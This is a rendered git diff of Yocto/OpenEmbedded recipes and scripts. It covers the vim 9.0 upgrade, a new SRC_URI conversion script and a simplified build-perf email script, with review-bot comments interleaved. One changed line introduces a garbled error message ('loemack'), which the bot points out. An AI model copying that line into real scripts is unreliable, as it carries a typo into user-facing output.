39
diff --git a/meta/recipes-support/vim/files/no-path-adjust.patch b/meta/recipes-support/vim/files/no-path-adjust.patch
index 05c2d803f6..9d6da80913 100644
--- a/meta/recipes-support/vim/files/no-path-adjust.patch
+++ b/meta/recipes-support/vim/files/no-path-adjust.patch
@@ -7,9 +7,11 @@ Upstream-Status: Pending
7 7
8Signed-off-by: Joe Slater <joe.slater@windriver.com> 8Signed-off-by: Joe Slater <joe.slater@windriver.com>
9 9
10--- a/src/Makefile 10Index: git/src/Makefile
11+++ b/src/Makefile 11===================================================================
12@@ -2507,11 +2507,14 @@ installtools: $(TOOLS) $(DESTDIR)$(exec_ 12--- git.orig/src/Makefile
13+++ git/src/Makefile
14@@ -2565,11 +2565,14 @@ installtools: $(TOOLS) $(DESTDIR)$(exec_
13 rm -rf $$cvs; \ 15 rm -rf $$cvs; \
14 fi 16 fi
15 -chmod $(FILEMOD) $(DEST_TOOLS)/* 17 -chmod $(FILEMOD) $(DEST_TOOLS)/*
diff --git a/meta/recipes-support/vim/files/racefix.patch b/meta/recipes-support/vim/files/racefix.patch
deleted file mode 100644
index 48dca44cad..0000000000
--- a/meta/recipes-support/vim/files/racefix.patch
+++ /dev/null
@@ -1,33 +0,0 @@
1The creation of the LINGUAS file is duplicated for each desktop file
2which can lead the commands to race against each other. Rework
3the makefile to avoid this as the expense of leaving the file on disk.
4
5Upstream-Status: Pending
6RP 2021/2/15
7
8Index: git/src/po/Makefile
9===================================================================
10--- git.orig/src/po/Makefile
11+++ git/src/po/Makefile
12@@ -165,17 +165,16 @@ $(PACKAGE).pot: ../*.c ../if_perl.xs ../
13 po/gvim.desktop.in po/vim.desktop.in
14 mv -f ../$(PACKAGE).po $(PACKAGE).pot
15
16-vim.desktop: vim.desktop.in $(POFILES)
17+LINGUAS:
18 echo $(LANGUAGES) | tr " " "\n" |sed -e '/\./d' | sort > LINGUAS
19+
20+vim.desktop: vim.desktop.in $(POFILES) LINGUAS
21 $(MSGFMT) --desktop -d . --template vim.desktop.in -o tmp_vim.desktop
22- rm -f LINGUAS
23 if command -v desktop-file-validate; then desktop-file-validate tmp_vim.desktop; fi
24 mv tmp_vim.desktop vim.desktop
25
26-gvim.desktop: gvim.desktop.in $(POFILES)
27- echo $(LANGUAGES) | tr " " "\n" |sed -e '/\./d' | sort > LINGUAS
28+gvim.desktop: gvim.desktop.in $(POFILES) LINGUAS
29 $(MSGFMT) --desktop -d . --template gvim.desktop.in -o tmp_gvim.desktop
30- rm -f LINGUAS
31 if command -v desktop-file-validate; then desktop-file-validate tmp_gvim.desktop; fi
32 mv tmp_gvim.desktop gvim.desktop
33
diff --git a/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch b/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch
index 37914d4cd9..5284ba45b6 100644
--- a/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch
+++ b/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch
@@ -14,11 +14,11 @@ Signed-off-by: Changqing Li <changqing.li@windriver.com>
14 src/configure.ac | 7 +++++++ 14 src/configure.ac | 7 +++++++
15 1 file changed, 7 insertions(+) 15 1 file changed, 7 insertions(+)
16 16
17diff --git a/src/configure.ac b/src/configure.ac 17Index: git/src/configure.ac
18index 0ee86ad..64736f0 100644 18===================================================================
19--- a/src/configure.ac 19--- git.orig/src/configure.ac
20+++ b/src/configure.ac 20+++ git/src/configure.ac
21@@ -3192,11 +3192,18 @@ AC_TRY_COMPILE([#include <stdio.h>], [int x __attribute__((unused));], 21@@ -3264,11 +3264,18 @@ AC_TRY_COMPILE([#include <stdio.h>], [in
22 AC_MSG_RESULT(no)) 22 AC_MSG_RESULT(no))
23 23
24 dnl Checks for header files. 24 dnl Checks for header files.
@@ -37,6 +37,3 @@ index 0ee86ad..64736f0 100644
37 37
38 AC_HEADER_DIRENT 38 AC_HEADER_DIRENT
39 39
40--
412.7.4
42
diff --git a/meta/recipes-support/vim/vim-tiny_8.2.bb b/meta/recipes-support/vim/vim-tiny_9.0.bb
index e4c26d23f6..e4c26d23f6 100644
--- a/meta/recipes-support/vim/vim-tiny_8.2.bb
+++ b/meta/recipes-support/vim/vim-tiny_9.0.bb
diff --git a/meta/recipes-support/vim/vim.inc b/meta/recipes-support/vim/vim.inc
index d57f784da5..6d62bd67af 100644
--- a/meta/recipes-support/vim/vim.inc
+++ b/meta/recipes-support/vim/vim.inc
@@ -1,29 +1,37 @@
1SUMMARY = "Vi IMproved - enhanced vi editor" 1SUMMARY = "Vi IMproved - enhanced vi editor"
2DESCRIPTION = "Vim is a greatly improved version of the good old UNIX editor Vi. Many new features have been added: multi-level undo, syntax highlighting, command line history, on-line help, spell checking, filename completion, block operations, script language, etc. There is also a Graphical User Interface (GUI) available."
2SECTION = "console/utils" 3SECTION = "console/utils"
3 4
5HOMEPAGE = "https://www.vim.org/"
6BUGTRACKER = "https://github.com/vim/vim/issues"
7
4DEPENDS = "ncurses gettext-native" 8DEPENDS = "ncurses gettext-native"
5# vimdiff doesn't like busybox diff 9# vimdiff doesn't like busybox diff
6RSUGGESTS_${PN} = "diffutils" 10RSUGGESTS_${PN} = "diffutils"
11
7LICENSE = "vim" 12LICENSE = "vim"
8LIC_FILES_CHKSUM = "file://runtime/doc/uganda.txt;endline=287;md5=a19edd7ec70d573a005d9e509375a99a" 13LIC_FILES_CHKSUM = "file://LICENSE;md5=d1a651ab770b45d41c0f8cb5a8ca930e"
9 14
10SRC_URI = "git://github.com/vim/vim.git \ 15SRC_URI = "git://github.com/vim/vim.git;branch=master;protocol=https \
11 file://disable_acl_header_check.patch \ 16 file://disable_acl_header_check.patch \
12 file://vim-add-knob-whether-elf.h-are-checked.patch \ 17 file://vim-add-knob-whether-elf.h-are-checked.patch \
13 file://0001-src-Makefile-improve-reproducibility.patch \ 18 file://0001-src-Makefile-improve-reproducibility.patch \
14 file://no-path-adjust.patch \ 19 file://no-path-adjust.patch \
15 file://racefix.patch \ 20 "
16" 21
17SRCREV = "98056533b96b6b5d8849641de93185dd7bcadc44" 22PV .= ".2190"
23SRCREV = "6a950da86d7a6eb09d5ebeab17657986420d07ac"
18 24
19# Do not consider .z in x.y.z, as that is updated with every commit 25# Do not consider .z in x.y.z, as that is updated with every commit
20UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+)\.0" 26UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+)\.0"
27# Ignore that the upstream version .z in x.y.z is always newer
28UPSTREAM_VERSION_UNKNOWN = "1"
21 29
22S = "${WORKDIR}/git" 30S = "${WORKDIR}/git"
23 31
24VIMDIR = "vim${@d.getVar('PV').split('.')[0]}${@d.getVar('PV').split('.')[1]}" 32VIMDIR = "vim${@d.getVar('PV').split('.')[0]}${@d.getVar('PV').split('.')[1]}"
25 33
26inherit autotools-brokensep update-alternatives mime-xdg 34inherit autotools-brokensep update-alternatives mime-xdg pkgconfig
27 35
28CLEANBROKEN = "1" 36CLEANBROKEN = "1"
29 37
@@ -32,29 +40,24 @@ do_configure () {
32 cd src 40 cd src
33 rm -f auto/* 41 rm -f auto/*
34 touch auto/config.mk 42 touch auto/config.mk
43 # git timestamps aren't reliable, so touch the shipped .po files so they aren't regenerated
44 touch -c po/cs.cp1250.po po/ja.euc-jp.po po/ja.sjis.po po/ko.po po/pl.UTF-8.po po/pl.cp1250.po po/ru.cp1251.po po/sk.cp1250.po po/uk.cp1251.po po/zh_CN.po po/zh_CN.cp936.po po/zh_TW.po
45 # ru.cp1251.po uses CP1251 rather than cp1251, fix that
46 sed -i -e s/CP1251/cp1251/ po/ru.cp1251.po
35 aclocal 47 aclocal
36 autoconf 48 autoconf
37 cd .. 49 cd ..
38 oe_runconf 50 oe_runconf
39 touch src/auto/configure 51 touch src/auto/configure
40 touch src/auto/config.mk src/auto/config.h 52 touch src/auto/config.mk src/auto/config.h
53 # need a native tool, not a target one
54 ${BUILD_CC} src/po/sjiscorr.c -o src/po/sjiscorr
41} 55}
42 56
43do_compile() { 57PACKAGECONFIG ??= "\
44 # We do not support fully / correctly the following locales. Attempting
45 # to use these with msgfmt in order to update the ".desktop" files exposes
46 # this problem and leads to the compile failing.
47 for LOCALE in cs fr ko pl sk zh_CN zh_TW;do
48 echo -n > src/po/${LOCALE}.po
49 done
50 autotools_do_compile
51}
52
53#Available PACKAGECONFIG options are gtkgui, acl, x11, tiny
54PACKAGECONFIG ??= ""
55PACKAGECONFIG += " \
56 ${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)} \ 58 ${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)} \
57 ${@bb.utils.contains('DISTRO_FEATURES', 'x11', 'x11 gtkgui', '', d)} \ 59 ${@bb.utils.contains('DISTRO_FEATURES', 'x11', 'x11 gtkgui', '', d)} \
60 nls \
58" 61"
59 62
60PACKAGECONFIG[gtkgui] = "--enable-gui=gtk3,--enable-gui=no,gtk+3" 63PACKAGECONFIG[gtkgui] = "--enable-gui=gtk3,--enable-gui=no,gtk+3"
@@ -63,6 +66,7 @@ PACKAGECONFIG[x11] = "--with-x,--without-x,xt,"
63PACKAGECONFIG[tiny] = "--with-features=tiny,--with-features=big,," 66PACKAGECONFIG[tiny] = "--with-features=tiny,--with-features=big,,"
64PACKAGECONFIG[selinux] = "--enable-selinux,--disable-selinux,libselinux," 67PACKAGECONFIG[selinux] = "--enable-selinux,--disable-selinux,libselinux,"
65PACKAGECONFIG[elfutils] = "--enable-elf-check,,elfutils," 68PACKAGECONFIG[elfutils] = "--enable-elf-check,,elfutils,"
69PACKAGECONFIG[nls] = "--enable-nls,--disable-nls,,"
66 70
67EXTRA_OECONF = " \ 71EXTRA_OECONF = " \
68 --disable-gpm \ 72 --disable-gpm \
@@ -71,6 +75,7 @@ EXTRA_OECONF = " \
71 --disable-netbeans \ 75 --disable-netbeans \
72 --disable-desktop-database-update \ 76 --disable-desktop-database-update \
73 --with-tlib=ncurses \ 77 --with-tlib=ncurses \
78 --with-modified-by='${MAINTAINER}' \
74 ac_cv_small_wchar_t=no \ 79 ac_cv_small_wchar_t=no \
75 ac_cv_path_GLIB_COMPILE_RESOURCES=no \ 80 ac_cv_path_GLIB_COMPILE_RESOURCES=no \
76 vim_cv_getcwd_broken=no \ 81 vim_cv_getcwd_broken=no \
@@ -83,6 +88,11 @@ EXTRA_OECONF = " \
83 STRIP=/bin/true \ 88 STRIP=/bin/true \
84" 89"
85 90
91# Some host distros don't have it, disable consistently
92# also disable on dunfell target builds
93EXTRA_OECONF_append_class-native = " vim_cv_timer_create=no"
94EXTRA_OECONF_append_class-target = " vim_cv_timer_create=no"
95
86do_install() { 96do_install() {
87 autotools_do_install 97 autotools_do_install
88 98
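Review bot: The added `--with-modified-by='${MAINTAINER}'` in EXTRA_OECONF wraps the expanded value in single quotes, so a MAINTAINER string that contains an apostrophe would end the quoting early and break the configure command line. The option also compiles the maintainer name and address into the binary, where vim reports it in its version output, so every image built from this recipe carries that string. A comment above the line would make this explicit, for example `# MAINTAINER is embedded in the vim binary and shown by :version; keep it free of single quotes`.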
diff --git a/meta/recipes-support/vim/vim_8.2.bb b/meta/recipes-support/vim/vim_9.0.bb
index 709b6ddb55..709b6ddb55 100644
--- a/meta/recipes-support/vim/vim_8.2.bb
+++ b/meta/recipes-support/vim/vim_9.0.bb
diff --git a/meta/recipes-support/vte/vte_0.58.3.bb b/meta/recipes-support/vte/vte_0.58.3.bb
index 41dc2e77c9..50724700e8 100644
--- a/meta/recipes-support/vte/vte_0.58.3.bb
+++ b/meta/recipes-support/vte/vte_0.58.3.bb
@@ -1,4 +1,6 @@
1SUMMARY = "Virtual terminal emulator GTK+ widget library" 1SUMMARY = "Virtual terminal emulator GTK+ widget library"
2DESCRIPTION = "VTE provides a virtual terminal widget for GTK applications."
3HOMEPAGE = "https://wiki.gnome.org/Apps/Terminal/VTE"
2BUGTRACKER = "https://bugzilla.gnome.org/buglist.cgi?product=vte" 4BUGTRACKER = "https://bugzilla.gnome.org/buglist.cgi?product=vte"
3LICENSE = "GPLv3 & LGPLv3+ & LGPLv2.1+" 5LICENSE = "GPLv3 & LGPLv3+ & LGPLv2.1+"
4LICENSE_libvte = "LGPLv3+" 6LICENSE_libvte = "LGPLv3+"
diff --git a/scripts/bitbake-whatchanged b/scripts/bitbake-whatchanged
index 3095dafa46..6f4b268119 100755
--- a/scripts/bitbake-whatchanged
+++ b/scripts/bitbake-whatchanged
@@ -217,7 +217,7 @@ print what will be done between the current and last builds, for example:
217 # Edit the recipes 217 # Edit the recipes
218 $ bitbake-whatchanged core-image-sato 218 $ bitbake-whatchanged core-image-sato
219 219
220The changes will be printed" 220The changes will be printed.
221 221
222Note: 222Note:
223 The amount of tasks is not accurate when the task is "do_build" since 223 The amount of tasks is not accurate when the task is "do_build" since
diff --git a/scripts/buildhistory-diff b/scripts/buildhistory-diff
index 833f7c33a5..02eedafd6e 100755
--- a/scripts/buildhistory-diff
+++ b/scripts/buildhistory-diff
@@ -11,7 +11,6 @@
11import sys 11import sys
12import os 12import os
13import argparse 13import argparse
14from distutils.version import LooseVersion
15 14
16# Ensure PythonGit is installed (buildhistory_analysis needs it) 15# Ensure PythonGit is installed (buildhistory_analysis needs it)
17try: 16try:
@@ -71,10 +70,6 @@ def main():
71 parser = get_args_parser() 70 parser = get_args_parser()
72 args = parser.parse_args() 71 args = parser.parse_args()
73 72
74 if LooseVersion(git.__version__) < '0.3.1':
75 sys.stderr.write("Version of GitPython is too old, please install GitPython (python-git) 0.3.1 or later in order to use this script\n")
76 sys.exit(1)
77
78 if len(args.revisions) > 2: 73 if len(args.revisions) > 2:
79 sys.stderr.write('Invalid argument(s) specified: %s\n\n' % ' '.join(args.revisions[2:])) 74 sys.stderr.write('Invalid argument(s) specified: %s\n\n' % ' '.join(args.revisions[2:]))
80 parser.print_help() 75 parser.print_help()
diff --git a/scripts/contrib/build-perf-test-wrapper.sh b/scripts/contrib/build-perf-test-wrapper.sh
index fa71d4a2e9..0a85e6e708 100755
--- a/scripts/contrib/build-perf-test-wrapper.sh
+++ b/scripts/contrib/build-perf-test-wrapper.sh
@@ -87,21 +87,10 @@ if [ $# -ne 0 ]; then
87 exit 1 87 exit 1
88fi 88fi
89 89
90if [ -n "$email_to" ]; then
91 if ! [ -x "$(command -v phantomjs)" ]; then
92 echo "ERROR: Sending email needs phantomjs."
93 exit 1
94 fi
95 if ! [ -x "$(command -v optipng)" ]; then
96 echo "ERROR: Sending email needs optipng."
97 exit 1
98 fi
99fi
100
101# Open a file descriptor for flock and acquire lock 90# Open a file descriptor for flock and acquire lock
102LOCK_FILE="/tmp/oe-build-perf-test-wrapper.lock" 91LOCK_FILE="/tmp/oe-build-perf-test-wrapper.lock"
103if ! exec 3> "$LOCK_FILE"; then 92if ! exec 3> "$LOCK_FILE"; then
104 echo "ERROR: Unable to open lock file" 93 echo "ERROR: Unable to open loemack file"
105 exit 1 94 exit 1
106fi 95fi
107if ! flock -n 3; then 96if ! flock -n 3; then
@@ -226,7 +215,7 @@ if [ -n "$results_repo" ]; then
226 if [ -n "$email_to" ]; then 215 if [ -n "$email_to" ]; then
227 echo "Emailing test report" 216 echo "Emailing test report"
228 os_name=`get_os_release_var PRETTY_NAME` 217 os_name=`get_os_release_var PRETTY_NAME`
229 "$script_dir"/oe-build-perf-report-email.py --to "$email_to" --subject "Build Perf Test Report for $os_name" --text $report_txt --html $report_html "${OE_BUILD_PERF_REPORT_EMAIL_EXTRA_ARGS[@]}" 218 "$script_dir"/oe-build-perf-report-email.py --to "$email_to" --subject "Build Perf Test Report for $os_name" --text $report_txt "${OE_BUILD_PERF_REPORT_EMAIL_EXTRA_ARGS[@]}"
230 fi 219 fi
231 220
232 # Upload report files, unless we're on detached head 221 # Upload report files, unless we're on detached head
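Review bot: The new side of the lock-file check prints `ERROR: Unable to open loemack file`, which looks like stray characters typed into the message; it should stay `echo "ERROR: Unable to open lock file"`. In the rewritten email call, `--text $report_txt` is unquoted while the neighbouring arguments are quoted; `--text "$report_txt"` keeps a path with spaces as a single argument. The lock is a fixed name under /tmp opened with `exec 3>`, so on a shared host another account can pre-create it and block the run. A per-user or build-directory location would avoid that, though that line is unchanged context in this hunk.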
diff --git a/scripts/contrib/convert-srcuri.py b/scripts/contrib/convert-srcuri.py
new file mode 100755
index 0000000000..5b362ea2e8
--- /dev/null
+++ b/scripts/contrib/convert-srcuri.py
@@ -0,0 +1,77 @@
1#!/usr/bin/env python3
2#
3# Conversion script to update SRC_URI to add branch to git urls
4#
5# Copyright (C) 2021 Richard Purdie
6#
7# SPDX-License-Identifier: GPL-2.0-only
8#
9
10import re
11import os
12import sys
13import tempfile
14import shutil
15import mimetypes
16
17if len(sys.argv) < 2:
18 print("Please specify a directory to run the conversion script against.")
19 sys.exit(1)
20
21def processfile(fn):
22 def matchline(line):
23 if "MIRROR" in line or ".*" in line or "GNOME_GIT" in line:
24 return False
25 return True
26 print("processing file '%s'" % fn)
27 try:
28 if "distro_alias.inc" in fn or "linux-yocto-custom.bb" in fn:
29 return
30 fh, abs_path = tempfile.mkstemp()
31 modified = False
32 with os.fdopen(fh, 'w') as new_file:
33 with open(fn, "r") as old_file:
34 for line in old_file:
35 if ("git://" in line or "gitsm://" in line) and "branch=" not in line and matchline(line):
36 if line.endswith('"\n'):
37 line = line.replace('"\n', ';branch=master"\n')
38 elif line.endswith(" \\\n"):
39 line = line.replace(' \\\n', ';branch=master \\\n')
40 modified = True
41 if ("git://" in line or "gitsm://" in line) and "github.com" in line and "protocol=https" not in line and matchline(line):
42 if "protocol=git" in line:
43 line = line.replace('protocol=git', 'protocol=https')
44 elif line.endswith('"\n'):
45 line = line.replace('"\n', ';protocol=https"\n')
46 elif line.endswith(" \\\n"):
47 line = line.replace(' \\\n', ';protocol=https \\\n')
48 modified = True
49 new_file.write(line)
50 if modified:
51 shutil.copymode(fn, abs_path)
52 os.remove(fn)
53 shutil.move(abs_path, fn)
54 except UnicodeDecodeError:
55 pass
56
57ourname = os.path.basename(sys.argv[0])
58ourversion = "0.1"
59
60if os.path.isfile(sys.argv[1]):
61 processfile(sys.argv[1])
62 sys.exit(0)
63
64for targetdir in sys.argv[1:]:
65 print("processing directory '%s'" % targetdir)
66 for root, dirs, files in os.walk(targetdir):
67 for name in files:
68 if name == ourname:
69 continue
70 fn = os.path.join(root, name)
71 if os.path.islink(fn):
72 continue
73 if "/.git/" in fn or fn.endswith(".html") or fn.endswith(".patch") or fn.endswith(".m4") or fn.endswith(".diff"):
74 continue
75 processfile(fn)
76
77print("All files processed with version %s" % ourversion)
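Review bot: processfile() leaves its temporary file behind whenever a file needs no change or raises UnicodeDecodeError, because `tempfile.mkstemp()` is called for every file and the result is only moved when `modified` is set; over a whole layer tree that is one stray file per recipe in the temp directory. When a file is modified, `os.remove(fn)` followed by `shutil.move(abs_path, fn)` leaves a window in which the recipe does not exist, and an interruption there loses it. Creating the temporary file next to the target and swapping it in with `os.replace` closes that window, and a `finally` clause removes the leftover in the other cases. The imports `re` and `mimetypes` are not used in the visible code and can be dropped.

```python
def processfile(fn):
    # … unchanged: matchline(), the "processing file" print, the skip list …
    fh, abs_path = tempfile.mkstemp(dir=os.path.dirname(fn) or ".")
    modified = False
    try:
        with os.fdopen(fh, 'w') as new_file, open(fn, "r") as old_file:
            for line in old_file:
                # … unchanged: branch= and protocol=https rewriting …
                new_file.write(line)
        if modified:
            shutil.copymode(fn, abs_path)
            os.replace(abs_path, fn)
    except UnicodeDecodeError:
        pass
    finally:
        # nothing is left to clean up once the file has been swapped into place
        if os.path.exists(abs_path):
            os.remove(abs_path)
```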
diff --git a/scripts/contrib/documentation-audit.sh b/scripts/contrib/documentation-audit.sh
index 1191f57a8e..f436f9bae0 100755
--- a/scripts/contrib/documentation-audit.sh
+++ b/scripts/contrib/documentation-audit.sh
@@ -27,7 +27,7 @@ fi
27 27
28echo "REMINDER: you need to build for MACHINE=qemux86 or you won't get useful results" 28echo "REMINDER: you need to build for MACHINE=qemux86 or you won't get useful results"
29echo "REMINDER: you need to set LICENSE_FLAGS_WHITELIST appropriately in local.conf or " 29echo "REMINDER: you need to set LICENSE_FLAGS_WHITELIST appropriately in local.conf or "
30echo " you'll get false positives. For example, LICENSE_FLAGS_WHITELIST = \"Commercial\"" 30echo " you'll get false positives. For example, LICENSE_FLAGS_WHITELIST = \"commercial\""
31 31
32for pkg in `bitbake -s | awk '{ print \$1 }'`; do 32for pkg in `bitbake -s | awk '{ print \$1 }'`; do
33 if [[ "$pkg" == "Loading" || "$pkg" == "Loaded" || 33 if [[ "$pkg" == "Loading" || "$pkg" == "Loaded" ||
diff --git a/scripts/contrib/oe-build-perf-report-email.py b/scripts/contrib/oe-build-perf-report-email.py
index de3862c897..7192113c28 100755
--- a/scripts/contrib/oe-build-perf-report-email.py
+++ b/scripts/contrib/oe-build-perf-report-email.py
@@ -19,8 +19,6 @@ import socket
19import subprocess 19import subprocess
20import sys 20import sys
21import tempfile 21import tempfile
22from email.mime.image import MIMEImage
23from email.mime.multipart import MIMEMultipart
24from email.mime.text import MIMEText 22from email.mime.text import MIMEText
25 23
26 24
@@ -29,30 +27,6 @@ logging.basicConfig(level=logging.INFO, format="%(levelname)s: %(message)s")
29log = logging.getLogger('oe-build-perf-report') 27log = logging.getLogger('oe-build-perf-report')
30 28
31 29
32# Find js scaper script
33SCRAPE_JS = os.path.join(os.path.dirname(__file__), '..', 'lib', 'build_perf',
34 'scrape-html-report.js')
35if not os.path.isfile(SCRAPE_JS):
36 log.error("Unableto find oe-build-perf-report-scrape.js")
37 sys.exit(1)
38
39
40class ReportError(Exception):
41 """Local errors"""
42 pass
43
44
45def check_utils():
46 """Check that all needed utils are installed in the system"""
47 missing = []
48 for cmd in ('phantomjs', 'optipng'):
49 if not shutil.which(cmd):
50 missing.append(cmd)
51 if missing:
52 log.error("The following tools are missing: %s", ' '.join(missing))
53 sys.exit(1)
54
55
56def parse_args(argv): 30def parse_args(argv):
57 """Parse command line arguments""" 31 """Parse command line arguments"""
58 description = """Email build perf test report""" 32 description = """Email build perf test report"""
@@ -77,137 +51,19 @@ def parse_args(argv):
77 "the email parts") 51 "the email parts")
78 parser.add_argument('--text', 52 parser.add_argument('--text',
79 help="Plain text message") 53 help="Plain text message")
80 parser.add_argument('--html',
81 help="HTML peport generated by oe-build-perf-report")
82 parser.add_argument('--phantomjs-args', action='append',
83 help="Extra command line arguments passed to PhantomJS")
84 54
85 args = parser.parse_args(argv) 55 args = parser.parse_args(argv)
86 56
87 if not args.html and not args.text: 57 if not args.text:
88 parser.error("Please specify --html and/or --text") 58 parser.error("Please specify --text")
89 59
90 return args 60 return args
91 61
92 62
93def decode_png(infile, outfile): 63def send_email(text_fn, subject, recipients, copy=[], blind_copy=[]):
94 """Parse/decode/optimize png data from a html element"""
95 with open(infile) as f:
96 raw_data = f.read()
97
98 # Grab raw base64 data
99 b64_data = re.sub('^.*href="data:image/png;base64,', '', raw_data, 1)
100 b64_data = re.sub('">.+$', '', b64_data, 1)
101
102 # Replace file with proper decoded png
103 with open(outfile, 'wb') as f:
104 f.write(base64.b64decode(b64_data))
105
106 subprocess.check_output(['optipng', outfile], stderr=subprocess.STDOUT)
107
108
109def mangle_html_report(infile, outfile, pngs):
110 """Mangle html file into a email compatible format"""
111 paste = True
112 png_dir = os.path.dirname(outfile)
113 with open(infile) as f_in:
114 with open(outfile, 'w') as f_out:
115 for line in f_in.readlines():
116 stripped = line.strip()
117 # Strip out scripts
118 if stripped == '<!--START-OF-SCRIPTS-->':
119 paste = False
120 elif stripped == '<!--END-OF-SCRIPTS-->':
121 paste = True
122 elif paste:
123 if re.match('^.+href="data:image/png;base64', stripped):
124 # Strip out encoded pngs (as they're huge in size)
125 continue
126 elif 'www.gstatic.com' in stripped:
127 # HACK: drop references to external static pages
128 continue
129
130 # Replace charts with <img> elements
131 match = re.match('<div id="(?P<id>\w+)"', stripped)
132 if match and match.group('id') in pngs:
133 f_out.write('<img src="cid:{}"\n'.format(match.group('id')))
134 else:
135 f_out.write(line)
136
137
138def scrape_html_report(report, outdir, phantomjs_extra_args=None):
139 """Scrape html report into a format sendable by email"""
140 tmpdir = tempfile.mkdtemp(dir='.')
141 log.debug("Using tmpdir %s for phantomjs output", tmpdir)
142
143 if not os.path.isdir(outdir):
144 os.mkdir(outdir)
145 if os.path.splitext(report)[1] not in ('.html', '.htm'):
146 raise ReportError("Invalid file extension for report, needs to be "
147 "'.html' or '.htm'")
148
149 try:
150 log.info("Scraping HTML report with PhangomJS")
151 extra_args = phantomjs_extra_args if phantomjs_extra_args else []
152 subprocess.check_output(['phantomjs', '--debug=true'] + extra_args +
153 [SCRAPE_JS, report, tmpdir],
154 stderr=subprocess.STDOUT)
155
156 pngs = []
157 images = []
158 for fname in os.listdir(tmpdir):
159 base, ext = os.path.splitext(fname)
160 if ext == '.png':
161 log.debug("Decoding %s", fname)
162 decode_png(os.path.join(tmpdir, fname),
163 os.path.join(outdir, fname))
164 pngs.append(base)
165 images.append(fname)
166 elif ext in ('.html', '.htm'):
167 report_file = fname
168 else:
169 log.warning("Unknown file extension: '%s'", ext)
170 #shutil.move(os.path.join(tmpdir, fname), outdir)
171
172 log.debug("Mangling html report file %s", report_file)
173 mangle_html_report(os.path.join(tmpdir, report_file),
174 os.path.join(outdir, report_file), pngs)
175 return (os.path.join(outdir, report_file),
176 [os.path.join(outdir, i) for i in images])
177 finally:
178 shutil.rmtree(tmpdir)
179
180def send_email(text_fn, html_fn, image_fns, subject, recipients, copy=[],
181 blind_copy=[]):
182 """Send email"""
183 # Generate email message 64 # Generate email message
184 text_msg = html_msg = None 65 with open(text_fn) as f:
185 if text_fn: 66 msg = MIMEText("Yocto build performance test report.\n" + f.read(), 'plain')
186 with open(text_fn) as f:
187 text_msg = MIMEText("Yocto build performance test report.\n" +
188 f.read(), 'plain')
189 if html_fn:
190 html_msg = msg = MIMEMultipart('related')
191 with open(html_fn) as f:
192 html_msg.attach(MIMEText(f.read(), 'html'))
193 for img_fn in image_fns:
194 # Expect that content id is same as the filename
195 cid = os.path.splitext(os.path.basename(img_fn))[0]
196 with open(img_fn, 'rb') as f:
197 image_msg = MIMEImage(f.read())
198 image_msg['Content-ID'] = '<{}>'.format(cid)
199 html_msg.attach(image_msg)
200
201 if text_msg and html_msg:
202 msg = MIMEMultipart('alternative')
203 msg.attach(text_msg)
204 msg.attach(html_msg)
205 elif text_msg:
206 msg = text_msg
207 elif html_msg:
208 msg = html_msg
209 else:
210 raise ReportError("Neither plain text nor html body specified")
211 67
212 pw_data = pwd.getpwuid(os.getuid()) 68 pw_data = pwd.getpwuid(os.getuid())
213 full_name = pw_data.pw_gecos.split(',')[0] 69 full_name = pw_data.pw_gecos.split(',')[0]
@@ -234,8 +90,6 @@ def main(argv=None):
234 if args.debug: 90 if args.debug:
235 log.setLevel(logging.DEBUG) 91 log.setLevel(logging.DEBUG)
236 92
237 check_utils()
238
239 if args.outdir: 93 if args.outdir:
240 outdir = args.outdir 94 outdir = args.outdir
241 if not os.path.exists(outdir): 95 if not os.path.exists(outdir):
@@ -245,25 +99,16 @@ def main(argv=None):
245 99
246 try: 100 try:
247 log.debug("Storing email parts in %s", outdir) 101 log.debug("Storing email parts in %s", outdir)
248 html_report = images = None
249 if args.html:
250 html_report, images = scrape_html_report(args.html, outdir,
251 args.phantomjs_args)
252
253 if args.to: 102 if args.to:
254 log.info("Sending email to %s", ', '.join(args.to)) 103 log.info("Sending email to %s", ', '.join(args.to))
255 if args.cc: 104 if args.cc:
256 log.info("Copying to %s", ', '.join(args.cc)) 105 log.info("Copying to %s", ', '.join(args.cc))
257 if args.bcc: 106 if args.bcc:
258 log.info("Blind copying to %s", ', '.join(args.bcc)) 107 log.info("Blind copying to %s", ', '.join(args.bcc))
259 send_email(args.text, html_report, images, args.subject, 108 send_email(args.text, args.subject, args.to, args.cc, args.bcc)
260 args.to, args.cc, args.bcc)
261 except subprocess.CalledProcessError as err: 109 except subprocess.CalledProcessError as err:
262 log.error("%s, with output:\n%s", str(err), err.output.decode()) 110 log.error("%s, with output:\n%s", str(err), err.output.decode())
263 return 1 111 return 1
264 except ReportError as err:
265 log.error(err)
266 return 1
267 finally: 112 finally:
268 if not args.outdir: 113 if not args.outdir:
269 log.debug("Wiping %s", outdir) 114 log.debug("Wiping %s", outdir)
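Review bot: The rewritten `send_email(text_fn, subject, recipients, copy=[], blind_copy=[])` loses its `"""Send email"""` docstring and keeps list literals as default arguments, which are shared between calls. A docstring such as `"""Send the plain-text report in text_fn to recipients, with optional Cc and Bcc lists."""` restores the documentation. `copy=None, blind_copy=None` would be the usual form, provided the part of the body outside this hunk treats None as an empty list. In parse_args, the manual `if not args.text: parser.error(...)` could become `required=True` on the `--text` argument now that it is the only body option.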
diff --git a/scripts/create-pull-request b/scripts/create-pull-request
index 8eefcf63a5..2f91a355b0 100755
--- a/scripts/create-pull-request
+++ b/scripts/create-pull-request
@@ -128,7 +128,7 @@ PROTO_RE="[a-z][a-z+]*://"
128GIT_RE="\(^\($PROTO_RE\)\?\)\($USER_RE@\)\?\([^:/]*\)[:/]\(.*\)" 128GIT_RE="\(^\($PROTO_RE\)\?\)\($USER_RE@\)\?\([^:/]*\)[:/]\(.*\)"
129REMOTE_URL=${REMOTE_URL%.git} 129REMOTE_URL=${REMOTE_URL%.git}
130REMOTE_REPO=$(echo $REMOTE_URL | sed "s#$GIT_RE#\5#") 130REMOTE_REPO=$(echo $REMOTE_URL | sed "s#$GIT_RE#\5#")
